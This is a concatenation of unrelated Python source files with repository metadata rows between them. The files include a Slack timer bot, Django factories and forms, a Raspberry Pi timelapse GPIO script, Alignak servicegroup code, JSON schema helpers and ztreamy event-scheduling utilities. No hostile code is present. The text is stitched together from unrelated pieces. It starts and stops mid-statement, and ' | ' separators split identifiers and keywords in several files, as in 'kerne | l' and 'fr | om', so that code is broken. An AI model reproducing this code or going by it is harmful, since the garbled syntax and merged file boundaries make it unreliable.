assert push_access_levels == [AccessLevel.NO_ACCESS.value]
assert merge_access_levels == [AccessLevel.DEVELOPER.value]
assert push_access_user_ids == []
assert merge_access_user_ids == []
assert unprotect_access_level is AccessLevel.MAINTAINER.value
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
unprotect_access_level,
) = gitlab.get_only_branch_access_levels(
group_and_project, "*_allow_pushes_access_levels"
)
assert push_access_levels == [Access |
venmo/slouch | example.py | Python | mit | 2,870 | 0.001742 | #!/usr/bin/env python
"""
TimerBot can manage multiple stopwatch-style timers from Slack.
Usage:
timerbot [--start_fmt=<start_fmt>] [--stop_fmt=<stop_fmt>] <slack_token>
timerbot --help
Options:
--start_fmt=<start_fmt> Format string for start responses (given a datetime) [default: {}]
--stop_fmt=<stop_fmt> Format string for start responses (given a timedelta) [default: {}]
--help Show this screen.
"""
import datetime
import logging
import sys
from docopt import docopt
from slouch import Bot, help
# You might also be interested in this bot's tests:
# https://github.com/venmo/slouch/blob/master/tests/test_example_bot.py
class TimerBot(Bot):
    def prepare_bot(self, config):
        """Store response format strings from *config* and init the timer table.

        ``self.timers`` maps timer name (None for the default timer) to the
        datetime at which the timer was started.
        """
        # It's fine to start implementation-specific state directly on the bot.
        self.start_fmt = config['start_fmt']
        self.stop_fmt = config['stop_fmt']
        self.timers = {}
self.timers = {}
# This is optional; it provides a help command that lists and gives details on other commands.
TimerBot.command(help)
@TimerBot.command
def start(opts, bot, event):
    """Usage: start [--name=<name>]
    Start a timer.
    Without _name_, start the default timer.
    To run more than one timer at once, pass _name_ to start and stop.
    """
    # NOTE: the docstring above is parsed (docopt usage) and shown as help;
    # do not edit it casually.
    name = opts['--name']  # None selects the default timer
    now = datetime.datetime.now()
    # Overwrites any timer already running under this name.
    bot.timers[name] = now
    return bot.start_fmt.format(now)
@TimerBot.command
def stop(opts, bot, event):
    """Usage: stop [--name=<name>] [--notify=<slack_username>]
    Stop a timer.
    _name_ works the same as for `start`.
    If given _slack_username_, reply with an at-mention to the given user.
    """
    # (The docstring above is parsed as docopt usage/help -- leave intact.)
    name = opts['--name']
    slack_username = opts['--notify']
    now = datetime.datetime.now()
    # Bug fix: popping an unknown timer used to raise KeyError and crash the
    # command; report the problem to the user instead. Timer values are always
    # datetimes, so None is a safe sentinel here.
    started_at = bot.timers.pop(name, None)
    if started_at is None:
        if name is None:
            return "The default timer is not running."
        return "No timer named {} is running.".format(name)
    delta = now - started_at
    response = bot.stop_fmt.format(delta)
    if slack_username:
        mention = ''
        # The slack api (provided by https://github.com/os/slacker) is available on all bots.
        users = bot.slack.users.list().body['members']
        for user in users:
            if user['name'] == slack_username:
                mention = "<@%s>" % user['id']
                break
        response = "%s: %s" % (mention, response)
    return response
if __name__ == '__main__':
    # Parse CLI options from the module docstring (docopt).
    args = docopt(__doc__)
    slack_token = args['<slack_token>']
    config = {
        'start_fmt': args['--start_fmt'],
        'stop_fmt': args['--stop_fmt'],
    }
    # Send slouch's DEBUG-level logs to stdout with a timestamped format.
    log = logging.getLogger('slouch')
    log.setLevel(logging.DEBUG)
    console_handler = logging.StreamHandler(sys.stdout)
    console_handler.setFormatter(logging.Formatter(
        fmt=('%(asctime)s %(name)s'
             ' (%(filename)s:%(lineno)s)'
             ' %(levelname)s:'
             ' %(message)s'),
        datefmt='%H:%M:%S'))
    log.addHandler(console_handler)
    # Blocks here until the process is interrupted.
    bot = TimerBot(slack_token, config)
    bot.run_forever()
|
anhstudios/swganh | data/scripts/templates/object/static/structure/general/shared_fountain_generic_style_1.py | Python | mit | 462 | 0.047619 | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swg | py.object import *
def create(kerne | l):
result = Static()
result.template = "object/static/structure/general/shared_fountain_generic_style_1.iff"
result.attribute_template_id = -1
result.stfName("obj_n","unknown_object")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result |
toladata/TolaActivity | factories/django_models.py | Python | apache-2.0 | 848 | 0 | from django.template.defaultfilters import slugify
from factory import DjangoModelFactory, lazy_attribute
from workflow.models import ROLE_PROGRAM_ADMIN
class User(DjangoModelFactory):
    """Factory for ``auth.User``; username and email are derived from the name."""
    class Meta:
        model = 'auth.User'
        django_get_or_create = ('username',)
    first_name = 'Thom'
    last_name = 'Yorke'
    # username is the slugified "first.last"; email reuses the username.
    username = lazy_attribute(lambda o: slugify(o.first_name + '.' +
                                                o.last_name))
    email = lazy_attribute(lambda o: o.username + "@testenv.com")
class Group(DjangoModelFactory):
    """Factory for ``auth.Group``; defaults to the program-admin role name."""
    class Meta:
        model = 'auth.Group'
        django_get_or_create = ('name',)
    name = ROLE_PROGRAM_ADMIN
class Site(DjangoModelFactory):
    """Factory for ``sites.Site`` pointing at the toladata.io domain."""
    class Meta:
        model = 'sites.Site'
        django_get_or_create = ('name',)
    name = 'toladata.io'
    domain = 'toladata.io'
eike-welk/clair | src/clairweb/clairweb/wsgi.py | Python | gpl-3.0 | 394 | 0 | """
WSGI config for | clairweb project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "clairweb.settings")
application | = get_wsgi_application()
|
alanmcna/timelapsecontroller | focusandshoot.py | Python | gpl-2.0 | 2,409 | 0.034454 | import sqlite3
import RPi.GPIO as GPIO
import os, sys, time
conn = sqlite3.connect( os.path.join( os.path.dirname(os.path.realpath(sys.argv[0])), 'db/timelapsecontroller.db'))
conn.row_factory = sqlite3.Row
sleep=2
def set_pid(pid=None):
c = conn.cursor()
try:
# Update the DB counter
c.execute("UPDATE timelapseconfig SET pid=?", ( int(pid), ) )
except sqlite3.Error as e:
print "An error occurred:", e.args[0]
# Save (commit) the changes
conn.commit()
print "Set the PID to be ", pid
def wakeup():
    """Pulse GPIO pin 7 high for 2 seconds to focus / wake the camera.

    Pin numbers use board mode (set in __main__); per the wiring notes,
    port 6 serves as ground and port 7 is live.
    """
    #Using Port 6 as Ground
    #Port 7 is Live
    #Sets up GPIO Pin 7 to Output
    GPIO.setup(7, GPIO.OUT)
    #Turns on GPIO Pin 7 - Enables Power to Pin 7 for focus / wake up.
    GPIO.output(7, True)
    time.sleep(2)
    GPIO.output(7, False)
def running():
    """Return True while capture is enabled and the target count is not reached."""
    c = conn.cursor()
    try:
        c.execute('SELECT * FROM timelapseconfig')
        config = c.fetchone()
        # conn.row_factory is sqlite3.Row, so columns are addressable by name.
        if config['running'] and config['count'] < config['target']:
            print "Running ({} of {})".format(config['count'], config['target'])
            return True
    except sqlite3.Error as e:
        print "An error occurred:", e.args[0]
    return False
def getsleep():
    """Read the configured sleep interval (seconds) from the config table.

    NOTE(review): on a sqlite3.Error this falls through and implicitly
    returns None, which would crash the caller's time.sleep(None) --
    confirm whether a numeric default should be returned instead.
    """
    c = conn.cursor()
    try:
        c.execute('SELECT * FROM timelapseconfig')
        config = c.fetchone()
        return config['sleep']
    except sqlite3.Error as e:
        print "An error occurred:", e.args[0]
def shoot():
    """Pulse GPIO pin 11 high for 2 seconds to trigger the shutter."""
    #Sets up GPIO Pin 11 to Output
    GPIO.setup(11, GPIO.OUT)
    #Pause for 2 Seconds (Hold Fire for 2 Seconds)
    #Turns on GPIO Pin 11 - Enables Power to Pin 11 to Shoot
    GPIO.output(11, True)
    time.sleep(2)
    GPIO.output(11, False)
def updatecounter():
    """Increment the shot counter in the config table and commit."""
    c = conn.cursor()
    try:
        # Update the DB counter
        c.execute("UPDATE timelapseconfig set count=count+1")
    except sqlite3.Error as e:
        print "An error occurred:", e.args[0]
    # Save (commit) the changes
    conn.commit()
    print "Incrementing counter"
if __name__ == "__main__":
    #Set the Board Mode
    GPIO.setmode(GPIO.BOARD)
    #Write (set) PID to config
    set_pid(os.getpid())
    # Main capture loop: when running() reports the target has not been
    # reached, wake the camera, fire the shutter, and record the shot;
    # then sleep for the configured interval.
    while True:
        if ( running() ):
            wakeup()
            shoot()
            updatecounter()
        #Pause for configured # of seconds (default 2)
        sleep = getsleep()
        print "Sleeping for %r seconds.." % sleep
        time.sleep(sleep)
    # NOTE(review): the loop above never breaks, so the cleanup below is
    # unreachable except via an exception -- confirm the intended shutdown path.
    #Write (unset) PID to config
    set_pid(None)
    # close the DB conn
    conn.close()
    #Stops the script and End of script clean up of the GPIO Port
    GPIO.cleanup()
|
dalou/django-extended | django_extended/fields/price.py | Python | bsd-3-clause | 873 | 0.003436 | # -*- coding: utf-8 -*-
from django.db import models |
from django import forms
from django.utils.text import capfirst
fr | om ..forms import PriceField as PriceFormField, PriceInput
class PriceField(models.DecimalField):
    """A decimal model field preconfigured for money amounts.

    Defaults to 2 decimal places and 21 max digits, and renders through
    the package's PriceField form field.
    (The previous docstring about hex color values was a copy-paste left-over.)
    """

    def __init__(self, *args, **kwargs):
        # Apply the money defaults only when the caller did not override them.
        kwargs.setdefault('decimal_places', 2)
        kwargs.setdefault('max_digits', 21)
        super(PriceField, self).__init__(*args, **kwargs)

    def formfield(self, **kwargs):
        # Force our dedicated form field class for model forms.
        defaults = dict(kwargs, form_class=PriceFormField)
        return super(PriceField, self).formfield(**defaults)
# Register introspection rules so legacy South migrations can handle this
# custom field; silently skipped when South is not installed.
try:
    from south.modelsinspector import add_introspection_rules
    add_introspection_rules([], ["^django_extended\.fields\.PriceField"])
except ImportError:
    pass
miteshvp/fabric8-analytics-worker | f8a_worker/schemas.py | Python | gpl-3.0 | 15,518 | 0.00116 | """U | tilities for accessing and working with JSON schemas."""
import abc
from collections import namedtuple, OrderedDict
from functools import wraps
import importlib
import json
import os.path
import pkgutil
import jsl
import jsonschema
def added_in(role):
    """Provide helper for schema fields added in a particular version.

    Example:
        with added_in(ROLE_v2_0_0) as since_v2_0:
            since_v2_0.new_field_name = ...
    """
    def _is_active(version):
        # The field exists for the given role and every later one.
        return version >= role
    return jsl.Scope(_is_active)
def removed_in(role):
    """Provide helper for schema fields removed in a particular version.

    Example:
        with removed_in(ROLE_v2_0_0) as before_v2_0:
            before_v2_0.old_field_name = ...
    """
    def _is_active(version):
        # The field exists only for roles strictly before the given one.
        return version < role
    return jsl.Scope(_is_active)
class JSLWithSchemaAttribute(jsl.Document):
    """JSL schema for name, version, url."""
    # Name is limited to word characters; version must look like "N-N-N".
    name = jsl.StringField(required=True, description='Name of the schema',
                           pattern=r'^[a-zA-Z0-9_]+$')
    version = jsl.StringField(required=True, description='Version of the schema',
                              pattern=r'^[0-9]+-[0-9]+-[0-9]+$')
    url = jsl.UriField(required=False, description='Full URL of the schema')
class JSLSchemaBase(jsl.Document):
    """Base class for all schema definitions.
    This class serves as a base class for all schema definitions that should
    include the `schema` object (with `name`, `version` and optional `url`).
    """
    def get_schema(self, role, ordered=True):
        """Override of jsl.Document.get_schema with these changes.
        - an explicit *role* argument is required
        - the *ordered* parameter defaults to True
        """
        schema_as_json = super(JSLSchemaBase, self).get_schema(role, ordered)
        # Set schema title based on the definition ID and active role
        try:
            options = self.Options
            definition_id = options.definition_id
        except AttributeError as exc:
            # Subclasses must declare Options.definition_id to be publishable.
            msg = "Published schema {} missing 'definition_id' option"
            raise TypeError(msg.format(type(self).__name__)) from exc
        title = "{}-{}".format(definition_id, role)
        schema_as_json["title"] = title
        return schema_as_json
    schema = jsl.DocumentField(JSLWithSchemaAttribute,
                               description='Information about schema of this document')
class JSLSchemaBaseWithRelease(JSLSchemaBase):
    """JSL schema for release id."""
    # Optional "ecosystem:package:version" identifier of the described release.
    _release = jsl.StringField(
        required=False,
        description='Unique release id in form of "ecosystem:package:version"'
    )
class SchemaRef(namedtuple("SchemaRef", "name version")):
    """Name and version number for a JSON schema."""

    # 3.4.3 compatibility: prevent __dict__ override
    __slots__ = ()

    def __str__(self):
        return "%s v%s" % (self.name, self.version)

    # --- helpers for deriving new schema versions from this one ---

    def _split_version_info(self):
        """Return the dash-separated version string as a tuple of ints."""
        return tuple(int(piece) for piece in self.version.split("-"))

    def _replace_version_info(self, model, revision, addition):
        """Return a copy of this ref with the version rebuilt from the parts."""
        rebuilt = "-".join(str(part) for part in (model, revision, addition))
        return self._replace(version=rebuilt)

    def next_addition(self):
        """Bump addition."""
        major, minor, patch = self._split_version_info()
        return self._replace_version_info(major, minor, patch + 1)

    def next_revision(self):
        """Bump revision (the addition component is kept as-is)."""
        major, minor, patch = self._split_version_info()
        return self._replace_version_info(major, minor + 1, patch)

    def next_model(self):
        """Bump model (revision and addition are kept as-is)."""
        major, minor, patch = self._split_version_info()
        return self._replace_version_info(major + 1, minor, patch)
class SchemaLookupError(LookupError):
    """Failed to find requested schema in schema library."""

    def __init__(self, schema_ref):
        # The SchemaRef (or ref-like object) that could not be resolved.
        self.schema_ref = schema_ref

    def __str__(self):
        return "Unknown schema: %s" % (self.schema_ref,)
class SchemaModuleAttributeError(AttributeError):
    """No such attribute defined."""

    def __init__(self, mod, attribute):
        # Module that was inspected and the attribute it was missing.
        self.mod = mod
        self.attribute = attribute

    def __str__(self):
        template = ("Module {0} doesn't define attribute {1} "
                    "necessary for automatic schema load")
        return template.format(self.mod, self.attribute)
class SchemaImportError(ImportError):
    """Failed to import schema from module."""

    def __init__(self, mod):
        # Fully-qualified name of the module that failed to import.
        self.mod = mod

    def __str__(self):
        return "Can't import schema from module {0}".format(self.mod)
class AbstractSchemaLibrary(object, metaclass=abc.ABCMeta):
    """Abstract class for schema."""
    def load_schema(self, schema_ref):
        """Load and parse specified schema from the library."""
        try:
            schema_data = self.read_binary_schema(schema_ref)
        except Exception as exc:
            # Any failure in the concrete reader surfaces uniformly as a
            # lookup error, with the original exception chained.
            raise SchemaLookupError(schema_ref) from exc
        # OrderedDict preserves the key order of the schema document.
        return json.loads(schema_data.decode("utf-8"), object_pairs_hook=OrderedDict)
    @abc.abstractmethod
    def read_binary_schema(self, schema_ref):
        """Read raw binary schema from path constructed from given schema ref."""
        raise NotImplementedError('read_binary_schema is abstract method')
class SchemaLibrary(AbstractSchemaLibrary):
    """Load named and versioned JSON schemas."""
    def __init__(self, schema_dir):
        # Py2 compatibility: use explicit super()
        super(SchemaLibrary, self).__init__()
        self.schema_dir = schema_dir
        # Schema files live at <schema_dir>/<name>-v<version>.schema.json.
        self._schema_pattern = os.path.join(schema_dir, "{}-v{}.schema.json")
    def read_binary_schema(self, schema_ref):
        """Read raw binary schema from path constructed from given schema ref."""
        schema_path = self._schema_pattern.format(*schema_ref)
        with open(schema_path, "rb") as schema_file:
            return schema_file.read()
class BundledSchemaLibrary(SchemaLibrary):
    """Load named and version JSON schemas bundled with a Python package."""
    def __init__(self, schema_dir, base_module):
        # Py2 compatibility: use explicit super()
        super(BundledSchemaLibrary, self).__init__(schema_dir)
        # Package whose bundled data files contain the schemas (via pkgutil).
        self.base_module = base_module
    def read_binary_schema(self, schema_ref):
        """Read raw binary schema from path constructed from given schema ref."""
        schema_path = self._schema_pattern.format(*schema_ref)
        return pkgutil.get_data(self.base_module, schema_path)
class BundledDynamicSchemaLibrary(AbstractSchemaLibrary):
"""Load named and version JSON schemas bundled with a Python package."""
def __init__(self, schema_mod_fqn):
"""Initialize object."""
# Py2 compatibility: use explicit super()
super(BundledDynamicSchemaLibrary, self).__init__()
self.schema_mod_fqn = schema_mod_fqn
def read_binary_schema(self, schema_ref):
"""Read raw binary schema from path constructed from given schema ref."""
result_class, role = self.load_schema_class_and_role(schema_ref)
return json.dumps(result_class().get_schema(ordered=True, role=role)).encode('utf-8')
def load_schema_class_and_role(self, schema_ref):
"""Load schema class and role."""
module_fqn = '.'.join([self.schema_mod_fqn, schema_ref.name.replace('-', '_')])
try:
mod = importlib.import_module(module_fqn)
except ImportError as e:
raise SchemaImportError(module_fqn) from e
role_name = 'ROLE_v{}'.format(schema_ref.version).replace('-', '_')
result_class_name = 'THE_SCHEMA'
if not hasattr(mod, role_name):
raise SchemaModuleAttributeError(mod, role_name)
if not hasattr(mod, result_class_name):
raise SchemaModuleAttribu |
mozilla-lockbox/lockbox-extension | test/integration/pages/util/__init__.py | Python | mpl-2.0 | 43 | 0 | """Con | tain utility functions and tools.""" | |
fedjo/thesis | project/aat/forms.py | Python | apache-2.0 | 3,217 | 0.009636 | from django import forms
from aat.models import RecognizerPreTrainedData
class DefaultDetectionForm(forms.Form):
title = "Please specify the directory containing your videos"
#video = forms.FileField(required=True, widget=forms.ClearableFileInput())
video = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control'}),
required=True)
detection = forms.CharField(widget=forms.HiddenInput(),
required=True, initial=False)
recognizer = forms.CharField(widget=forms.HiddenInput(),
required=True, initial=False)
objdetection = forms.CharField(widget=forms.HiddenInput(),
required=True, initial=False)
transcription = forms.CharField(widget=forms.HiddenInput(),
required=True, initial=False)
class ComplexDetectionForm(forms.Form):
CHOICES = [('Yes', 'Yes'),
('No', 'No')]
title = "Please upload your video in zip format"
#video = forms.FileField(required=True, widget=forms.ClearableFileInput())
video = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control'}),
required=True)
detection = forms.CharField(widget=forms.HiddenInput(),
required=True, initial=False)
recognizer = forms.ChoiceField(choices=[('LBPH', 'Local Binary Patterns Histogram'),
('EF', 'Eighen Faces'),
('FF', 'Fisher Faces'),
#('KNN', 'LBPH using K-Nearest Neighbor'),
('false', 'Do not recognize faces')],
widget=forms.Select(attrs={'class': 'form-control '
'select select-primary', 'data-toggle': 'select'}))
faces_database = forms.ModelChoiceField(queryset= RecognizerPreTrainedData.objects.values_list('name', flat=True),
to_field_name='facedb',
empty_label='(Nothing)')
objdetection = forms.Char | Field(widget=forms.HiddenInput(),
required=True, initial=False)
transcription = forms.CharField(widget=forms.HiddenInput(),
required=True, initial=False)
| #iszip = forms.ChoiceField(choices=CHOICES,
# widget=forms.RadioSelect(attrs={'data-toggle': 'radio'}))
scale = forms.FloatField(widget=forms.NumberInput(attrs={'class': 'form-control', 'step': '0.1', 'placeholder': '1.3'}))
neighbors = forms.IntegerField(widget=forms.NumberInput(attrs={'class': 'form-control', 'placeholder': '5'}))
min_x_dimension = forms.IntegerField(widget=forms.NumberInput(attrs={'class': 'form-control', 'placeholder': '10'}))
min_y_dimension = forms.IntegerField(widget=forms.NumberInput(attrs={'class': 'form-control', 'placeholder': '10'}))
bounding_boxes = forms.BooleanField(required=False, initial=True)
# facesdb = forms.FileField(required=False, widget=forms.ClearableFileInput())
|
ddurieux/alignak | alignak/objects/servicegroup.py | Python | agpl-3.0 | 7,989 | 0.000751 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2015: Alignak team, see AUTHORS.txt file for contributors
#
# This file is part of Alignak.
#
# Alignak is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Alignak is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Alignak. If not, see <http://www.gnu.org/licenses/>.
#
#
# This file incorporates work covered by the follo | wing copyright and
# permission notice:
#
# Copyright (C) 2009-2014:
# Hartmut Goebel, h.goebel@goebel-consult.de
# Guillaume Bour, guillaume@bour.cc
# Nicolas Dupeux, nicolas@dupeux.net
# Grégory Starck, g.starck@gmail.com
| # Gerhard Lausser, gerhard.lausser@consol.de
# Sebastien Coavoux, s.coavoux@free.fr
# Christophe Simon, geektophe@gmail.com
# Jean Gabes, naparuba@gmail.com
# Romain Forlot, rforlot@yahoo.com
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
from alignak.property import StringProp, IntegerProp
from alignak.log import logger
from .itemgroup import Itemgroup, Itemgroups
from .service import Service
class Servicegroup(Itemgroup):
id = 1 # zero is always a little bit special... like in database
my_type = 'servicegroup'
properties = Itemgroup.properties.copy()
properties.update({
'id': IntegerProp(default=0, fill_brok=['full_status']),
'servicegroup_name': StringProp(fill_brok=['full_status']),
'alias': StringProp(fill_brok=['full_status']),
'notes': StringProp(default='', fill_brok=['full_status']),
'notes_url': StringProp(default='', fill_brok=['full_status']),
'action_url': StringProp(default='', fill_brok=['full_status']),
})
macros = {
'SERVICEGROUPALIAS': 'alias',
'SERVICEGROUPMEMBERS': 'members',
'SERVICEGROUPNOTES': 'notes',
'SERVICEGROUPNOTESURL': 'notes_url',
'SERVICEGROUPACTIONURL': 'action_url'
}
def get_services(self):
if getattr(self, 'members', None) is not None:
return self.members
else:
return []
def get_name(self):
return self.servicegroup_name
def get_servicegroup_members(self):
if self.has('servicegroup_members'):
return [m.strip() for m in self.servicegroup_members.split(',')]
else:
return []
# We fillfull properties with template ones if need
# Because hostgroup we call may not have it's members
# we call get_hosts_by_explosion on it
def get_services_by_explosion(self, servicegroups):
# First we tag the hg so it will not be explode
# if a son of it already call it
self.already_explode = True
# Now the recursive part
# rec_tag is set to False every HG we explode
# so if True here, it must be a loop in HG
# calls... not GOOD!
if self.rec_tag:
logger.error("[servicegroup::%s] got a loop in servicegroup definition",
self.get_name())
if self.has('members'):
return self.members
else:
return ''
# Ok, not a loop, we tag it and continue
self.rec_tag = True
sg_mbrs = self.get_servicegroup_members()
for sg_mbr in sg_mbrs:
sg = servicegroups.find_by_name(sg_mbr.strip())
if sg is not None:
value = sg.get_services_by_explosion(servicegroups)
if value is not None:
self.add_string_member(value)
if self.has('members'):
return self.members
else:
return ''
class Servicegroups(Itemgroups):
name_property = "servicegroup_name" # is used for finding servicegroup
inner_class = Servicegroup
def linkify(self, hosts, services):
self.linkify_sg_by_srv(hosts, services)
# We just search for each host the id of the host
# and replace the name by the id
# TODO: very slow for hight services, so search with host list,
# not service one
def linkify_sg_by_srv(self, hosts, services):
for sg in self:
mbrs = sg.get_services()
# The new member list, in id
new_mbrs = []
seek = 0
host_name = ''
if len(mbrs) == 1 and mbrs[0] != '':
sg.add_string_unknown_member('%s' % mbrs[0])
for mbr in mbrs:
if seek % 2 == 0:
host_name = mbr.strip()
else:
service_desc = mbr.strip()
find = services.find_srv_by_name_and_hostname(host_name, service_desc)
if find is not None:
new_mbrs.append(find)
else:
host = hosts.find_by_name(host_name)
if not (host and host.is_excluded_for_sdesc(service_desc)):
sg.add_string_unknown_member('%s,%s' % (host_name, service_desc))
elif host:
self.configuration_warnings.append(
'servicegroup %r : %s is excluded from the services of the host %s'
% (sg, service_desc, host_name)
)
seek += 1
# Make members uniq
new_mbrs = list(set(new_mbrs))
# We find the id, we replace the names
sg.replace_members(new_mbrs)
for s in sg.members:
s.servicegroups.append(sg)
# and make this uniq
s.servicegroups = list(set(s.servicegroups))
# Add a service string to a service member
# if the service group do not exist, create it
def add_member(self, cname, sgname):
sg = self.find_by_name(sgname)
# if the id do not exist, create the cg
if sg is None:
sg = Servicegroup({'servicegroup_name': sgname, 'alias': sgname, 'members': cname})
self.add(sg)
else:
sg.add_string_member(cname)
# Use to fill members with contactgroup_members
def explode(self):
# We do not want a same hg to be explode again and again
# so we tag it
for sg in self:
sg.already_explode = False
for sg in self:
if sg.has('servicegroup_members') and not sg.already_explode:
# get_services_by_explosion is a recursive
# function, so we must tag hg so we do not loop
for sg2 in self:
sg2.rec_tag = False
sg.get_services_by_explosion(self)
# We clean the tags
for sg in self:
try:
del sg.rec_tag
except AttributeError:
pass
del sg.already_explode
|
jfisteus/ztreamy | ztreamy/tools/utils.py | Python | gpl-3.0 | 9,124 | 0.001534 | # ztreamy: a framework for publishing semantic events on the Web
# Copyright (C) 2011-2015 Jesus Arias Fisteus
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
import time
import random
import math
import sys
import logging
import tornado.ioloop
import ztreamy
from ztreamy import ZtreamyException
from ztreamy import events
from ztreamy import logger
class EventPublisher(object):
    """Publish one event through several publishers and track completion.

    ``finished`` flips to True once every publisher's callback has fired;
    ``error`` is latched when any response reports an error.
    """
    def __init__(self, event, publishers, add_timestamp=False, ioloop=None):
        self.event = event
        self.publishers = publishers
        self.add_timestamp = add_timestamp
        self.finished = False
        self.error = False
        # Number of publisher callbacks still outstanding.
        self._num_pending = 0
        self._external_callback = None
        self.ioloop = ioloop or tornado.ioloop.IOLoop.instance()
    def publish(self):
        """Send the event to every publisher, optionally adding a timestamp."""
        if self.add_timestamp:
            # Header value is "<sequence_num>/<unix time, ms precision>".
            self.event.set_extra_header('X-Float-Timestamp',
                                        (str(self.event.sequence_num) + '/'
                                         + "%.3f"%time.time()))
        self._num_pending = len(self.publishers)
        for publisher in self.publishers:
            publisher.publish(self.event, self._callback)
    def set_external_callback(self, callback):
        """Register a callback invoked once the last publisher finishes."""
        self._external_callback = callback
    def _callback(self, response):
        # One publisher responded; when the pending count hits zero, we're done.
        self._num_pending -= 1
        if self._num_pending == 0:
            self.finished = True
            if self._external_callback is not None:
                self._external_callback()
        if response.error:
            self.error = True
            logging.error(response.error)
        ## else:
        ##     logging.info('Event successfully sent to server')
class _FakeResponse(object):
    """Class used from StdoutPublisher to simulate a Tornado HTTP response."""
    def __init__(self, error=False):
        # Only the .error attribute is consulted by EventPublisher._callback.
        self.error = error
class StdoutPublisher(object):
    """Simulates the interface of client.EventPublisher to write to stdout.
    Useful mainly for sending the serialized events through a pipe to
    other processes.
    """
    def __init__(self, ioloop=None):
        # Default to the global Tornado IO loop when none is given.
        self.ioloop = ioloop or tornado.ioloop.IOLoop.instance()
    def publish(self, event, callback=None):
        """Publishes a new event."""
        logger.logger.event_published(event)
        body = ztreamy.serialize_events([event])
        sys.stdout.write(body)
        sys.stdout.flush()
        if callback is not None:
            # Mimic the async HTTP client: schedule the callback on the IO
            # loop with a response-like object instead of calling it inline.
            def new_callback():
                callback(_FakeResponse())
            self.ioloop.add_callback(new_callback)
    def close(self):
        """Closes the event publisher."""
        pass
class EventScheduler(object):
    """Replays a stream of events on a Tornado ioloop at scheduled times."""
    def __init__(self, source_id, io_loop, publishers, time_scale,
                 event_generator, time_generator=None, add_timestamp=False,
                 initial_delay=2.0):
        """ Schedules the events of the given file and sends them.

        `source_id`: identifier to be set in command events generated
        by the scheduler. `io_loop`: instance of the ioloop to use.
        `publishers`: list of EventPublisher-compatible objects.
        `time_scale`: factor to accelerate time (used only when
        `time_generator` is None). `time_generator`: if not None,
        override times in the events and use the given iterator as a
        source of event fire times. If None, events are sent according
        to the timestamps they carry. `initial_delay`: seconds to wait
        before emitting the 'Event-Source-Started' command event.
        """
        # NOTE: event/time generators are consumed with .next(), i.e.
        # the Python 2 iterator protocol.
        self.period = 10.0
        self.source_id = source_id
        self.time_scale = time_scale
        self.publishers = publishers
        self.io_loop = io_loop
        self.add_timestamp = add_timestamp
        self.finished = False
        self._pending_events = []
        self._event_generator = event_generator
        self._time_generator = time_generator
        self.initial_delay = initial_delay
        # Periodically top up the queue of scheduled events (period in ms).
        self.sched = tornado.ioloop.PeriodicCallback(self._schedule_next_events,
                                                     self.period * 1000)
        self.sched.start()
        self._schedule_first_event()
    def _schedule_first_event(self):
        # Record the mapping between the first event's own timestamp and
        # wall-clock time; later events are offset relative to these.
        self._send_init_event()
        event = self._event_generator.next()
        self.t0_original = event.time()
        self.t0_new = time.time() + 2 + self.initial_delay
        self._schedule_event(event)
        self._schedule_next_events()
    def _schedule_next_events(self):
        # Drop already-finished publications, then schedule roughly the
        # next two periods' worth of events.
        self._pending_events = [p for p in self._pending_events \
                                if not p.finished]
        if not self.finished:
            try:
                limit = time.time() + 2 * self.period
                while True:
                    fire_time = self._schedule_event( \
                        self._event_generator.next())
                    if fire_time > limit:
                        break
            except StopIteration:
                # The generator is exhausted; close once everything
                # in flight has completed.
                self.finished = True
                if len(self._pending_events) > 0:
                    for event in self._pending_events:
                        event.set_external_callback(self._check_if_finished)
                else:
                    self._send_closing_event()
        elif len(self._pending_events) == 0:
            self.sched.stop()
            self.io_loop.stop()
    def _schedule_event(self, event):
        """Queue one event on the ioloop and return its fire time."""
        pub = EventPublisher(event, self.publishers,
                             add_timestamp=self.add_timestamp)
        self._pending_events.append(pub)
        if self._time_generator is None:
            # Rescale the event's original timeline onto wall-clock time.
            fire_time = (self.t0_new
                         + (event.time() - self.t0_original) / self.time_scale)
        else:
            fire_time = self._time_generator.next()
        self.io_loop.add_timeout(fire_time, pub.publish)
        return fire_time
    def _check_if_finished(self):
        # Called after the generator is exhausted, once per finishing event.
        self._pending_events = [p for p in self._pending_events \
                                if not p.finished]
        if len(self._pending_events) == 0:
            self._send_closing_event()
    def _send_closing_event(self):
        """Emit the 'Event-Source-Finished' command event."""
        # time.sleep(0.5)
        event = events.Command(self.source_id, 'ztreamy-command',
                               'Event-Source-Finished')
        pub = EventPublisher(event, self.publishers, add_timestamp=False)
        self._pending_events.append(pub)
        pub.publish()
